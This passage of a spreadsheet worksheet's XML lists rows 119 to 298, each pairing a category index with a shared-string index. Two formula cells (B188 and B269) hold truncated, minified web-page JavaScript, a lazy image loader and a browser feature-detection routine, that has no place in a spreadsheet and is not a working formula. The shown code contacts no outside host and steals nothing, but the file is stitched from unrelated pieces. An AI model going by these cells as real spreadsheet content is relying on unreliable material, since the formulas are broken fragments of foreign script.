      <c r="A119" t="s">
        <v>6</v>
      </c>
      <c r="B119" t="s">
        <v>364</v>
      </c>
    </row>
    <row r="120" spans="1:2">
      <c r="A120" t="s">
        <v>6</v>
      </c>
      <c r="B120" t="s">
        <v>365</v>
      </c>
    </row>
    <row r="121" spans="1:2">
      <c r="A121" t="s">
        <v>6</v>
      </c>
      <c r="B121" t="s">
        <v>366</v>
      </c>
    </row>
    <row r="122" spans="1:2">
      <c r="A122" t="s">
        <v>7</v>
      </c>
      <c r="B122" t="s">
        <v>367</v>
      </c>
    </row>
    <row r="123" spans="1:2">
      <c r="A123" t="s">
        <v>6</v>
      </c>
      <c r="B123" t="s">
        <v>368</v>
      </c>
    </row>
    <row r="124" spans="1:2">
      <c r="A124" t="s">
        <v>6</v>
      </c>
      <c r="B124" t="s">
        <v>369</v>
      </c>
    </row>
    <row r="125" spans="1:2">
      <c r="A125" t="s">
        <v>6</v>
      </c>
      <c r="B125" t="s">
        <v>370</v>
      </c>
    </row>
    <row r="126" spans="1:2">
      <c r="A126" t="s">
        <v>6</v>
      </c>
      <c r="B126" t="s">
        <v>371</v>
      </c>
    </row>
    <row r="127" spans="1:2">
      <c r="A127" t="s">
        <v>6</v>
      </c>
      <c r="B127" t="s">
        <v>372</v>
      </c>
    </row>
    <row r="128" spans="1:2">
      <c r="A128" t="s">
        <v>6</v>
      </c>
      <c r="B128" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="129" spans="1:2">
      <c r="A129" t="s">
        <v>6</v>
      </c>
      <c r="B129" t="s">
        <v>374</v>
      </c>
    </row>
    <row r="130" spans="1:2">
      <c r="A130" t="s">
        <v>6</v>
      </c>
      <c r="B130" t="s">
        <v>375</v>
      </c>
    </row>
    <row r="131" spans="1:2">
      <c r="A131" t="s">
        <v>6</v>
      </c>
      <c r="B131" t="s">
        <v>376</v>
      </c>
    </row>
    <row r="132" spans="1:2">
      <c r="A132" t="s">
        <v>6</v>
      </c>
      <c r="B132" t="s">
        <v>377</v>
      </c>
    </row>
    <row r="133" spans="1:2">
      <c r="A133" t="s">
        <v>6</v>
      </c>
      <c r="B133" t="s">
        <v>378</v>
      </c>
    </row>
    <row r="134" spans="1:2">
      <c r="A134" t="s">
        <v>6</v>
      </c>
      <c r="B134" t="s">
        <v>379</v>
      </c>
    </row>
    <row r="135" spans="1:2">
      <c r="A135" t="s">
        <v>6</v>
      </c>
      <c r="B135" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="136" spans="1:2">
      <c r="A136" t="s">
        <v>6</v>
      </c>
      <c r="B136" t="s">
        <v>381</v>
      </c>
    </row>
    <row r="137" spans="1:2">
      <c r="A137" t="s">
        <v>6</v>
      </c>
      <c r="B137" t="s">
        <v>382</v>
      </c>
    </row>
    <row r="138" spans="1:2">
      <c r="A138" t="s">
        <v>6</v>
      </c>
      <c r="B138" t="s">
        <v>383</v>
      </c>
    </row>
    <row r="139" spans="1:2">
      <c r="A139" t="s">
        <v>6</v>
      </c>
      <c r="B139" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="140" spans="1:2">
      <c r="A140" t="s">
        <v>8</v>
      </c>
      <c r="B140" t="s">
        <v>385</v>
      </c>
    </row>
    <row r="141" spans="1:2">
      <c r="A141" t="s">
        <v>8</v>
      </c>
      <c r="B141" t="s">
        <v>386</v>
      </c>
    </row>
    <row r="142" spans="1:2">
      <c r="A142" t="s">
        <v>8</v>
      </c>
      <c r="B142" t="s">
        <v>387</v>
      </c>
    </row>
    <row r="143" spans="1:2">
      <c r="A143" t="s">
        <v>8</v>
      </c>
      <c r="B143" t="s">
        <v>388</v>
      </c>
    </row>
    <row r="144" spans="1:2">
      <c r="A144" t="s">
        <v>8</v>
      </c>
      <c r="B144" t="s">
        <v>389</v>
      </c>
    </row>
    <row r="145" spans="1:2">
      <c r="A145" t="s">
        <v>8</v>
      </c>
      <c r="B145" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="146" spans="1:2">
      <c r="A146" t="s">
        <v>8</v>
      </c>
      <c r="B146" t="s">
        <v>391</v>
      </c>
    </row>
    <row r="147" spans="1:2">
      <c r="A147" t="s">
        <v>8</v>
      </c>
      <c r="B147" t="s">
        <v>392</v>
      </c>
    </row>
    <row r="148" spans="1:2">
      <c r="A148" t="s">
        <v>8</v>
      </c>
      <c r="B148" t="s">
        <v>393</v>
      </c>
    </row>
    <row r="149" spans="1:2">
      <c r="A149" t="s">
        <v>8</v>
      </c>
      <c r="B149" t="s">
        <v>394</v>
      </c>
    </row>
    <row r="150" spans="1:2">
      <c r="A150" t="s">
        <v>8</v>
      </c>
      <c r="B150" t="s">
        <v>395</v>
      </c>
    </row>
    <row r="151" spans="1:2">
      <c r="A151" t="s">
        <v>8</v>
      </c>
      <c r="B151" t="s">
        <v>396</v>
      </c>
    </row>
    <row r="152" spans="1:2">
      <c r="A152" t="s">
        <v>8</v>
      </c>
      <c r="B152" t="s">
        <v>397</v>
      </c>
    </row>
    <row r="153" spans="1:2">
      <c r="A153" t="s">
        <v>8</v>
      </c>
      <c r="B153" t="s">
        <v>398</v>
      </c>
    </row>
    <row r="154" spans="1:2">
      <c r="A154" t="s">
        <v>8</v>
      </c>
      <c r="B154" t="s">
        <v>399</v>
      </c>
    </row>
    <row r="155" spans="1:2">
      <c r="A155" t="s">
        <v>8</v>
      </c>
      <c r="B155" t="s">
        <v>400</v>
      </c>
    </row>
    <row r="156" spans="1:2">
      <c r="A156" t="s">
        <v>8</v>
      </c>
      <c r="B156" t="s">
        <v>401</v>
      </c>
    </row>
    <row r="157" spans="1:2">
      <c r="A157" t="s">
        <v>8</v>
      </c>
      <c r="B157" t="s">
        <v>402</v>
      </c>
    </row>
    <row r="158" spans="1:2">
      <c r="A158" t="s">
        <v>8</v>
      </c>
      <c r="B158" t="s">
        <v>403</v>
      </c>
    </row>
    <row r="159" spans="1:2">
      <c r="A159" t="s">
        <v>8</v>
      </c>
      <c r="B159" t="s">
        <v>404</v>
      </c>
    </row>
    <row r="160" spans="1:2">
      <c r="A160" t="s">
        <v>8</v>
      </c>
      <c r="B160" t="s">
        <v>405</v>
      </c>
    </row>
    <row r="161" spans="1:2">
      <c r="A161" t="s">
        <v>8</v>
      </c>
      <c r="B161" t="s">
        <v>406</v>
      </c>
    </row>
    <row r="162" spans="1:2">
      <c r="A162" t="s">
        <v>8</v>
      </c>
      <c r="B162" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="163" spans="1:2">
      <c r="A163" t="s">
        <v>8</v>
      </c>
      <c r="B163" t="s">
        <v>408</v>
      </c>
    </row>
    <row r="164" spans="1:2">
      <c r="A164" t="s">
        <v>8</v>
      </c>
      <c r="B164" t="s">
        <v>409</v>
      </c>
    </row>
    <row r="165" spans="1:2">
      <c r="A165" t="s">
        <v>8</v>
      </c>
      <c r="B165" t="s">
        <v>410</v>
      </c>
    </row>
    <row r="166" spans="1:2">
      <c r="A166" t="s">
        <v>8</v>
      </c>
      <c r="B166" t="s">
        <v>411</v>
      </c>
    </row>
    <row r="167" spans="1:2">
      <c r="A167" t="s">
        <v>8</v>
      </c>
      <c r="B167" t="s">
        <v>412</v>
      </c>
    </row>
    <row r="168" spans="1:2">
      <c r="A168" t="s">
        <v>8</v>
      </c>
      <c r="B168" t="s">
        <v>413</v>
      </c>
    </row>
    <row r="169" spans="1:2">
      <c r="A169" t="s">
        <v>8</v>
      </c>
      <c r="B169" t="s">
        <v>414</v>
      </c>
    </row>
    <row r="170" spans="1:2">
      <c r="A170" t="s">
        <v>8</v>
      </c>
      <c r="B170" t="s">
        <v>415</v>
      </c>
    </row>
    <row r="171" spans="1:2">
      <c r="A171" t="s">
        <v>8</v>
      </c>
      <c r="B171" t="s">
        <v>416</v>
      </c>
    </row>
    <row r="172" spans="1:2">
      <c r="A172" t="s">
        <v>9</v>
      </c>
      <c r="B172" t="s">
        <v>417</v>
      </c>
    </row>
    <row r="173" spans="1:2">
      <c r="A173" t="s">
        <v>9</v>
      </c>
      <c r="B173" t="s">
        <v>418</v>
      </c>
    </row>
    <row r="174" spans="1:2">
      <c r="A174" t="s">
        <v>9</v>
      </c>
      <c r="B174" t="s">
        <v>419</v>
      </c>
    </row>
    <row r="175" spans="1:2">
      <c r="A175" t="s">
        <v>9</v>
      </c>
      <c r="B175" t="s">
        <v>420</v>
      </c>
    </row>
    <row r="176" spans="1:2">
      <c r="A176" t="s">
        <v>9</v>
      </c>
      <c r="B176" t="s">
        <v>421</v>
      </c>
    </row>
    <row r="177" spans="1:2">
      <c r="A177" t="s">
        <v>9</v>
      </c>
      <c r="B177" t="s">
        <v>422</v>
      </c>
    </row>
    <row r="178" spans="1:2">
      <c r="A178" t="s">
        <v>9</v>
      </c>
      <c r="B178" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="179" spans="1:2">
      <c r="A179" t="s">
        <v>10</v>
      </c>
      <c r="B179" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="180" spans="1:2">
      <c r="A180" t="s">
        <v>10</v>
      </c>
      <c r="B180" t="s">
        <v>425</v>
      </c>
    </row>
    <row r="181" spans="1:2">
      <c r="A181" t="s">
        <v>10</v>
      </c>
      <c r="B181" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="182" spans="1:2">
      <c r="A182" t="s">
        <v>10</v>
      </c>
      <c r="B182" t="s">
        <v>427</v>
      </c>
    </row>
    <row r="183" spans="1:2">
      <c r="A183" t="s">
        <v>10</v>
      </c>
      <c r="B183" t="s">
        <v>428</v>
      </c>
    </row>
    <row r="184" spans="1:2">
      <c r="A184" t="s">
        <v>10</v>
      </c>
      <c r="B184" t="s">
        <v>429</v>
      </c>
    </row>
    <row r="185" spans="1:2">
      <c r="A185" t="s">
        <v>10</v>
      </c>
      <c r="B185" t="s">
        <v>430</v>
      </c>
    </row>
    <row r="186" spans="1:2">
      <c r="A186" t="s">
        <v>10</v>
      </c>
      <c r="B186" t="s">
        <v>431</v>
      </c>
    </row>
    <row r="187" spans="1:2">
      <c r="A187" t="s">
        <v>10</v>
      </c>
      <c r="B187" t="s">
        <v>432</v>
      </c>
    </row>
    <row r="188" spans="1:2">
      <c r="A188" t="s">
        <v>10</v>
      </c>
      <c r="B188">
        <f>new window.IntersectionObserver((e,n)=&gt;{e.forEach(e=&gt;{const{target:t,isIntersecting:o}=e;o&amp;&amp;(v(),n.unobserve(t))})}),p.observe(n)):v(),!f&amp;&amp;window. MutationObserver&amp;&amp;(f=new MutationObserver((function(){l(1)})),f.observe(n,{childList:!0,subtree:!0}))):n.setAttribute("data-guac-image","loaded")))):l()}.bind(this);l=function(e){u&amp;&amp;clearTimeout(u),u=setTimeout(m,isNaN(e)?c:e)}.bind(this),this.unmount=function(){u&amp;&amp;(clearTimeout(u),u=null),window.removeEventListener("resize",l),f&amp;&amp;f.disconnect(),p&amp;&amp;p.disconnect(),g=!1};const y=function(){n.removeEventListener("load",y),window.addEventListener("resize",l),m()};window.guacDefer&amp;&amp;!t.loadEagerly?(n.addEventListener("load",y),window.guacDefer.background(n)):y()}function i(e,n){const t={w:n.x,h:n.y};if("undefined"!=typeof window&amp;&amp;e){const n=Math.min(window.devicePixelRatio||1,3),o=window.getComputedStyle(e);if(t.w=Math.round(parseInt(o.width,10)*n),t.h=Math.round(parseInt(o.height,10)*n),isNaN(t.w)||isNaN(t.h))return}return t}function r(e,n,t){const o=n.w%t.x,i=n.h%t.y,r=Math.max(o?n.w+(t.x-o):n.w,t.x),c=Math.max(i?n.h+(t.y-i):n.h,t.y);return e.replace(/\{width\}/g,r).replace(/\{height\}/g,c)}o.getUrl=function(e,n,t){if(!n)throw new Error("cellSize is required");const o=i(t,n);if(o)return r(e,o,n)},e.exports=o},function(e,n,t){"use strict";let o=[],i=!1;const r=function(e){e.dispatchEvent(new Event("load"))},c={background:new IntersectionObserver((function(e,n){e.forEach((function(e){e.isIntersecting&amp;&amp;(n.unobserve(e.target),r(e.target))}))}),{rootMargin:"50% 0%"})};window.addEventListener("load",(function(){o.forEach((function(e){window.requestIdleCallback((function(){c.background.unobserve(e),r(e)}))})),i=!0,o=[]})),e.exports={background:function(e){if(window.requestIdleCallback){if(i)return void r(e);o.push(e)}c.background.observe(e)}}},function(e,n,t){"use strict";e.exports=function(e){return window.</f>
        <v>0</v>
      </c>
    </row>
    <row r="189" spans="1:2">
      <c r="A189" t="s">
        <v>10</v>
      </c>
      <c r="B189" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="190" spans="1:2">
      <c r="A190" t="s">
        <v>10</v>
      </c>
      <c r="B190" t="s">
        <v>434</v>
      </c>
    </row>
    <row r="191" spans="1:2">
      <c r="A191" t="s">
        <v>10</v>
      </c>
      <c r="B191" t="s">
        <v>435</v>
      </c>
    </row>
    <row r="192" spans="1:2">
      <c r="A192" t="s">
        <v>10</v>
      </c>
      <c r="B192" t="s">
        <v>436</v>
      </c>
    </row>
    <row r="193" spans="1:2">
      <c r="A193" t="s">
        <v>10</v>
      </c>
      <c r="B193" t="s">
        <v>437</v>
      </c>
    </row>
    <row r="194" spans="1:2">
      <c r="A194" t="s">
        <v>11</v>
      </c>
      <c r="B194" t="s">
        <v>438</v>
      </c>
    </row>
    <row r="195" spans="1:2">
      <c r="A195" t="s">
        <v>11</v>
      </c>
      <c r="B195" t="s">
        <v>439</v>
      </c>
    </row>
    <row r="196" spans="1:2">
      <c r="A196" t="s">
        <v>11</v>
      </c>
      <c r="B196" t="s">
        <v>440</v>
      </c>
    </row>
    <row r="197" spans="1:2">
      <c r="A197" t="s">
        <v>11</v>
      </c>
      <c r="B197" t="s">
        <v>441</v>
      </c>
    </row>
    <row r="198" spans="1:2">
      <c r="A198" t="s">
        <v>11</v>
      </c>
      <c r="B198" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="199" spans="1:2">
      <c r="A199" t="s">
        <v>11</v>
      </c>
      <c r="B199" t="s">
        <v>443</v>
      </c>
    </row>
    <row r="200" spans="1:2">
      <c r="A200" t="s">
        <v>11</v>
      </c>
      <c r="B200" t="s">
        <v>444</v>
      </c>
    </row>
    <row r="201" spans="1:2">
      <c r="A201" t="s">
        <v>11</v>
      </c>
      <c r="B201" t="s">
        <v>445</v>
      </c>
    </row>
    <row r="202" spans="1:2">
      <c r="A202" t="s">
        <v>11</v>
      </c>
      <c r="B202" t="s">
        <v>446</v>
      </c>
    </row>
    <row r="203" spans="1:2">
      <c r="A203" t="s">
        <v>11</v>
      </c>
      <c r="B203" t="s">
        <v>447</v>
      </c>
    </row>
    <row r="204" spans="1:2">
      <c r="A204" t="s">
        <v>11</v>
      </c>
      <c r="B204" t="s">
        <v>448</v>
      </c>
    </row>
    <row r="205" spans="1:2">
      <c r="A205" t="s">
        <v>11</v>
      </c>
      <c r="B205" t="s">
        <v>449</v>
      </c>
    </row>
    <row r="206" spans="1:2">
      <c r="A206" t="s">
        <v>11</v>
      </c>
      <c r="B206" t="s">
        <v>450</v>
      </c>
    </row>
    <row r="207" spans="1:2">
      <c r="A207" t="s">
        <v>11</v>
      </c>
      <c r="B207" t="s">
        <v>451</v>
      </c>
    </row>
    <row r="208" spans="1:2">
      <c r="A208" t="s">
        <v>11</v>
      </c>
      <c r="B208" t="s">
        <v>452</v>
      </c>
    </row>
    <row r="209" spans="1:2">
      <c r="A209" t="s">
        <v>11</v>
      </c>
      <c r="B209" t="s">
        <v>453</v>
      </c>
    </row>
    <row r="210" spans="1:2">
      <c r="A210" t="s">
        <v>11</v>
      </c>
      <c r="B210" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="211" spans="1:2">
      <c r="A211" t="s">
        <v>11</v>
      </c>
      <c r="B211" t="s">
        <v>455</v>
      </c>
    </row>
    <row r="212" spans="1:2">
      <c r="A212" t="s">
        <v>11</v>
      </c>
      <c r="B212" t="s">
        <v>456</v>
      </c>
    </row>
    <row r="213" spans="1:2">
      <c r="A213" t="s">
        <v>11</v>
      </c>
      <c r="B213" t="s">
        <v>457</v>
      </c>
    </row>
    <row r="214" spans="1:2">
      <c r="A214" t="s">
        <v>11</v>
      </c>
      <c r="B214" t="s">
        <v>458</v>
      </c>
    </row>
    <row r="215" spans="1:2">
      <c r="A215" t="s">
        <v>11</v>
      </c>
      <c r="B215" t="s">
        <v>459</v>
      </c>
    </row>
    <row r="216" spans="1:2">
      <c r="A216" t="s">
        <v>11</v>
      </c>
      <c r="B216" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="217" spans="1:2">
      <c r="A217" t="s">
        <v>11</v>
      </c>
      <c r="B217" t="s">
        <v>461</v>
      </c>
    </row>
    <row r="218" spans="1:2">
      <c r="A218" t="s">
        <v>11</v>
      </c>
      <c r="B218" t="s">
        <v>462</v>
      </c>
    </row>
    <row r="219" spans="1:2">
      <c r="A219" t="s">
        <v>11</v>
      </c>
      <c r="B219" t="s">
        <v>463</v>
      </c>
    </row>
    <row r="220" spans="1:2">
      <c r="A220" t="s">
        <v>11</v>
      </c>
      <c r="B220" t="s">
        <v>464</v>
      </c>
    </row>
    <row r="221" spans="1:2">
      <c r="A221" t="s">
        <v>11</v>
      </c>
      <c r="B221" t="s">
        <v>465</v>
      </c>
    </row>
    <row r="222" spans="1:2">
      <c r="A222" t="s">
        <v>11</v>
      </c>
      <c r="B222" t="s">
        <v>466</v>
      </c>
    </row>
    <row r="223" spans="1:2">
      <c r="A223" t="s">
        <v>11</v>
      </c>
      <c r="B223" t="s">
        <v>467</v>
      </c>
    </row>
    <row r="224" spans="1:2">
      <c r="A224" t="s">
        <v>11</v>
      </c>
      <c r="B224" t="s">
        <v>468</v>
      </c>
    </row>
    <row r="225" spans="1:2">
      <c r="A225" t="s">
        <v>11</v>
      </c>
      <c r="B225" t="s">
        <v>469</v>
      </c>
    </row>
    <row r="226" spans="1:2">
      <c r="A226" t="s">
        <v>11</v>
      </c>
      <c r="B226" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="227" spans="1:2">
      <c r="A227" t="s">
        <v>11</v>
      </c>
      <c r="B227" t="s">
        <v>471</v>
      </c>
    </row>
    <row r="228" spans="1:2">
      <c r="A228" t="s">
        <v>11</v>
      </c>
      <c r="B228" t="s">
        <v>472</v>
      </c>
    </row>
    <row r="229" spans="1:2">
      <c r="A229" t="s">
        <v>11</v>
      </c>
      <c r="B229" t="s">
        <v>473</v>
      </c>
    </row>
    <row r="230" spans="1:2">
      <c r="A230" t="s">
        <v>11</v>
      </c>
      <c r="B230" t="s">
        <v>474</v>
      </c>
    </row>
    <row r="231" spans="1:2">
      <c r="A231" t="s">
        <v>11</v>
      </c>
      <c r="B231" t="s">
        <v>475</v>
      </c>
    </row>
    <row r="232" spans="1:2">
      <c r="A232" t="s">
        <v>11</v>
      </c>
      <c r="B232" t="s">
        <v>476</v>
      </c>
    </row>
    <row r="233" spans="1:2">
      <c r="A233" t="s">
        <v>11</v>
      </c>
      <c r="B233" t="s">
        <v>477</v>
      </c>
    </row>
    <row r="234" spans="1:2">
      <c r="A234" t="s">
        <v>11</v>
      </c>
      <c r="B234" t="s">
        <v>478</v>
      </c>
    </row>
    <row r="235" spans="1:2">
      <c r="A235" t="s">
        <v>11</v>
      </c>
      <c r="B235" t="s">
        <v>479</v>
      </c>
    </row>
    <row r="236" spans="1:2">
      <c r="A236" t="s">
        <v>11</v>
      </c>
      <c r="B236" t="s">
        <v>480</v>
      </c>
    </row>
    <row r="237" spans="1:2">
      <c r="A237" t="s">
        <v>11</v>
      </c>
      <c r="B237" t="s">
        <v>481</v>
      </c>
    </row>
    <row r="238" spans="1:2">
      <c r="A238" t="s">
        <v>11</v>
      </c>
      <c r="B238" t="s">
        <v>482</v>
      </c>
    </row>
    <row r="239" spans="1:2">
      <c r="A239" t="s">
        <v>11</v>
      </c>
      <c r="B239" t="s">
        <v>483</v>
      </c>
    </row>
    <row r="240" spans="1:2">
      <c r="A240" t="s">
        <v>11</v>
      </c>
      <c r="B240" t="s">
        <v>484</v>
      </c>
    </row>
    <row r="241" spans="1:2">
      <c r="A241" t="s">
        <v>11</v>
      </c>
      <c r="B241" t="s">
        <v>485</v>
      </c>
    </row>
    <row r="242" spans="1:2">
      <c r="A242" t="s">
        <v>11</v>
      </c>
      <c r="B242" t="s">
        <v>486</v>
      </c>
    </row>
    <row r="243" spans="1:2">
      <c r="A243" t="s">
        <v>11</v>
      </c>
      <c r="B243" t="s">
        <v>487</v>
      </c>
    </row>
    <row r="244" spans="1:2">
      <c r="A244" t="s">
        <v>11</v>
      </c>
      <c r="B244" t="s">
        <v>488</v>
      </c>
    </row>
    <row r="245" spans="1:2">
      <c r="A245" t="s">
        <v>11</v>
      </c>
      <c r="B245" t="s">
        <v>489</v>
      </c>
    </row>
    <row r="246" spans="1:2">
      <c r="A246" t="s">
        <v>11</v>
      </c>
      <c r="B246" t="s">
        <v>490</v>
      </c>
    </row>
    <row r="247" spans="1:2">
      <c r="A247" t="s">
        <v>11</v>
      </c>
      <c r="B247" t="s">
        <v>491</v>
      </c>
    </row>
    <row r="248" spans="1:2">
      <c r="A248" t="s">
        <v>11</v>
      </c>
      <c r="B248" t="s">
        <v>492</v>
      </c>
    </row>
    <row r="249" spans="1:2">
      <c r="A249" t="s">
        <v>11</v>
      </c>
      <c r="B249" t="s">
        <v>493</v>
      </c>
    </row>
    <row r="250" spans="1:2">
      <c r="A250" t="s">
        <v>11</v>
      </c>
      <c r="B250" t="s">
        <v>494</v>
      </c>
    </row>
    <row r="251" spans="1:2">
      <c r="A251" t="s">
        <v>11</v>
      </c>
      <c r="B251" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="252" spans="1:2">
      <c r="A252" t="s">
        <v>12</v>
      </c>
      <c r="B252" t="s">
        <v>496</v>
      </c>
    </row>
    <row r="253" spans="1:2">
      <c r="A253" t="s">
        <v>12</v>
      </c>
      <c r="B253" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="254" spans="1:2">
      <c r="A254" t="s">
        <v>12</v>
      </c>
      <c r="B254" t="s">
        <v>498</v>
      </c>
    </row>
    <row r="255" spans="1:2">
      <c r="A255" t="s">
        <v>12</v>
      </c>
      <c r="B255" t="s">
        <v>499</v>
      </c>
    </row>
    <row r="256" spans="1:2">
      <c r="A256" t="s">
        <v>12</v>
      </c>
      <c r="B256" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="257" spans="1:2">
      <c r="A257" t="s">
        <v>12</v>
      </c>
      <c r="B257" t="s">
        <v>501</v>
      </c>
    </row>
    <row r="258" spans="1:2">
      <c r="A258" t="s">
        <v>12</v>
      </c>
      <c r="B258" t="s">
        <v>502</v>
      </c>
    </row>
    <row r="259" spans="1:2">
      <c r="A259" t="s">
        <v>12</v>
      </c>
      <c r="B259" t="s">
        <v>503</v>
      </c>
    </row>
    <row r="260" spans="1:2">
      <c r="A260" t="s">
        <v>12</v>
      </c>
      <c r="B260" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="261" spans="1:2">
      <c r="A261" t="s">
        <v>12</v>
      </c>
      <c r="B261" t="s">
        <v>505</v>
      </c>
    </row>
    <row r="262" spans="1:2">
      <c r="A262" t="s">
        <v>12</v>
      </c>
      <c r="B262" t="s">
        <v>506</v>
      </c>
    </row>
    <row r="263" spans="1:2">
      <c r="A263" t="s">
        <v>13</v>
      </c>
      <c r="B263" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="264" spans="1:2">
      <c r="A264" t="s">
        <v>13</v>
      </c>
      <c r="B264" t="s">
        <v>508</v>
      </c>
    </row>
    <row r="265" spans="1:2">
      <c r="A265" t="s">
        <v>13</v>
      </c>
      <c r="B265" t="s">
        <v>509</v>
      </c>
    </row>
    <row r="266" spans="1:2">
      <c r="A266" t="s">
        <v>13</v>
      </c>
      <c r="B266" t="s">
        <v>510</v>
      </c>
    </row>
    <row r="267" spans="1:2">
      <c r="A267" t="s">
        <v>13</v>
      </c>
      <c r="B267" t="s">
        <v>511</v>
      </c>
    </row>
    <row r="268" spans="1:2">
      <c r="A268" t="s">
        <v>13</v>
      </c>
      <c r="B268" t="s">
        <v>512</v>
      </c>
    </row>
    <row r="269" spans="1:2">
      <c r="A269" t="s">
        <v>13</v>
      </c>
      <c r="B269">
        <f>r._namespace("PageJS","AmazonUI");O.declare("prv:p-debug",D);r.declare("p-recorder-events",[]);r.declare("p-recorder-stop",function(){});G(d,"P",r);ka();if(k.addEventListener){var pa;k.addEventListener("DOMContentLoaded",pa=function(){r.trigger("a-domready");k.removeEventListener("DOMContentLoaded",pa,!1)},!1)}var g=k.documentElement,ba=function(){var a=["O","ms","Moz","Webkit"],b=k.createElement("div");return{testGradients:function(){return!0},test:function(d){var e=d.charAt(0).toUpperCase()+
d.substr(1);d=(a.join(e+" ")+e+" "+d).split(" "); for(e =d.length;e--;)if(""===b.style[d[e]])return!0;return!1},testTransform3d:function(){return!0}}}();u=g.className;var qa=/(^| )a-mobile( |$)/.test(u),ra=/(^| )a-tablet( |$)/.test(u),h={audio:function(){return!!k.createElement("audio").canPlayType},video:function(){return!!k.createElement("video").canPlayType},canvas:function(){return!!k.createElement("canvas").getContext},svg:function(){return!!k.createElementNS&amp;&amp;!!k.createElementNS("http://www.w3.org/2000/svg",
"svg").createSVGRect},offline:function(){return navigator.hasOwnProperty&amp;&amp;navigator.hasOwnProperty("onLine")&amp;&amp;navigator.onLine},dragDrop:function(){return"draggable"in k.createElement("span")},geolocation:function(){return!!navigator.geolocation},history:function(){return!(!d.history||!d.history.pushState)},webworker:function(){return!!d.</f>
        <v>0</v>
      </c>
    </row>
    <row r="270" spans="1:2">
      <c r="A270" t="s">
        <v>13</v>
      </c>
      <c r="B270" t="s">
        <v>513</v>
      </c>
    </row>
    <row r="271" spans="1:2">
      <c r="A271" t="s">
        <v>13</v>
      </c>
      <c r="B271" t="s">
        <v>514</v>
      </c>
    </row>
    <row r="272" spans="1:2">
      <c r="A272" t="s">
        <v>13</v>
      </c>
      <c r="B272" t="s">
        <v>515</v>
      </c>
    </row>
    <row r="273" spans="1:2">
      <c r="A273" t="s">
        <v>13</v>
      </c>
      <c r="B273" t="s">
        <v>516</v>
      </c>
    </row>
    <row r="274" spans="1:2">
      <c r="A274" t="s">
        <v>13</v>
      </c>
      <c r="B274" t="s">
        <v>517</v>
      </c>
    </row>
    <row r="275" spans="1:2">
      <c r="A275" t="s">
        <v>13</v>
      </c>
      <c r="B275" t="s">
        <v>518</v>
      </c>
    </row>
    <row r="276" spans="1:2">
      <c r="A276" t="s">
        <v>13</v>
      </c>
      <c r="B276" t="s">
        <v>519</v>
      </c>
    </row>
    <row r="277" spans="1:2">
      <c r="A277" t="s">
        <v>13</v>
      </c>
      <c r="B277" t="s">
        <v>520</v>
      </c>
    </row>
    <row r="278" spans="1:2">
      <c r="A278" t="s">
        <v>13</v>
      </c>
      <c r="B278" t="s">
        <v>521</v>
      </c>
    </row>
    <row r="279" spans="1:2">
      <c r="A279" t="s">
        <v>13</v>
      </c>
      <c r="B279" t="s">
        <v>522</v>
      </c>
    </row>
    <row r="280" spans="1:2">
      <c r="A280" t="s">
        <v>13</v>
      </c>
      <c r="B280" t="s">
        <v>523</v>
      </c>
    </row>
    <row r="281" spans="1:2">
      <c r="A281" t="s">
        <v>13</v>
      </c>
      <c r="B281" t="s">
        <v>524</v>
      </c>
    </row>
    <row r="282" spans="1:2">
      <c r="A282" t="s">
        <v>13</v>
      </c>
      <c r="B282" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="283" spans="1:2">
      <c r="A283" t="s">
        <v>13</v>
      </c>
      <c r="B283" t="s">
        <v>526</v>
      </c>
    </row>
    <row r="284" spans="1:2">
      <c r="A284" t="s">
        <v>14</v>
      </c>
      <c r="B284" t="s">
        <v>527</v>
      </c>
    </row>
    <row r="285" spans="1:2">
      <c r="A285" t="s">
        <v>14</v>
      </c>
      <c r="B285" t="s">
        <v>528</v>
      </c>
    </row>
    <row r="286" spans="1:2">
      <c r="A286" t="s">
        <v>14</v>
      </c>
      <c r="B286" t="s">
        <v>529</v>
      </c>
    </row>
    <row r="287" spans="1:2">
      <c r="A287" t="s">
        <v>14</v>
      </c>
      <c r="B287" t="s">
        <v>530</v>
      </c>
    </row>
    <row r="288" spans="1:2">
      <c r="A288" t="s">
        <v>14</v>
      </c>
      <c r="B288" t="s">
        <v>531</v>
      </c>
    </row>
    <row r="289" spans="1:2">
      <c r="A289" t="s">
        <v>14</v>
      </c>
      <c r="B289" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="290" spans="1:2">
      <c r="A290" t="s">
        <v>14</v>
      </c>
      <c r="B290" t="s">
        <v>533</v>
      </c>
    </row>
    <row r="291" spans="1:2">
      <c r="A291" t="s">
        <v>14</v>
      </c>
      <c r="B291" t="s">
        <v>534</v>
      </c>
    </row>
    <row r="292" spans="1:2">
      <c r="A292" t="s">
        <v>14</v>
      </c>
      <c r="B292" t="s">
        <v>535</v>
      </c>
    </row>
    <row r="293" spans="1:2">
      <c r="A293" t="s">
        <v>14</v>
      </c>
      <c r="B293" t="s">
        <v>536</v>
      </c>
    </row>
    <row r="294" spans="1:2">
      <c r="A294" t="s">
        <v>14</v>
      </c>
      <c r="B294" t="s">
        <v>537</v>
      </c>
    </row>
    <row r="295" spans="1:2">
      <c r="A295" t="s">
        <v>14</v>
      </c>
      <c r="B295" t="s">
        <v>538</v>
      </c>
    </row>
    <row r="296" spans="1:2">
      <c r="A296" t="s">
        <v>14</v>
      </c>
      <c r="B296" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="297" spans="1:2">
      <c r="A297" t="s">
        <v>14</v>
      </c>
      <c r="B297" t="s">
        <v>540</v>
      </c>
    </row>
    <row r="298" spans="1:2">
      <c r="A298" t="s">
        <v>14</v>
      </c>
      <c r="B298" t="s">
        <v>541</v>
      </c>
    </row>
